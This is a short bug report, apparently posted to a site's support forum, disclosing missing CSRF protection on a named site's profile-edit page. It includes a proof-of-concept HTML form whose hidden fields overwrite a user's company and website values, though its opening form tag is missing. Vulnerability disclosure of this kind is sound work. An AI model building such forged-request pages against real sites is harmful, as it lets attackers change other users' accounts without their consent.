0

BUG REPORT (1) (NO CSRF PROTECTION ON EDITING PROFILE)

victim01 1 year ago in Website 0

Hi team , 
i am a security researcher and i have founded this vulnerability ( bug) in
your website.

Bug type : no csrf Protection on edit your profile
Vulnerable url :

https://seekingalpha.com/user/48935916/comments#edit-all
Description : I found that i can force any one to change the account profile like company,website without users
information just because the lack of csrf protection on profile change.
There is no CSRF protection so i can force any user from your site.
An attacker could change any users account profile by csrf poc. 


Here is the poc for profile change: 

POC: 


<html>
  <body>
   


      <input type="hidden" name="company_name" value="hahahah" />
      <input type="hidden" name="site_url" value="www.haha.com/" />
      <input type="hidden" name="linkedin_url" value="" />
      <input type="hidden" name="twitter_url" value="" />
      <input type="hidden" name="bio" value="" />
      <input type="hidden" name="profile_type" value="user" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Let me know if you need a video as a poc. Thanks. HOPE YOU WILL FIXED THIS SOON. 

Regards:

Husnain Iqbal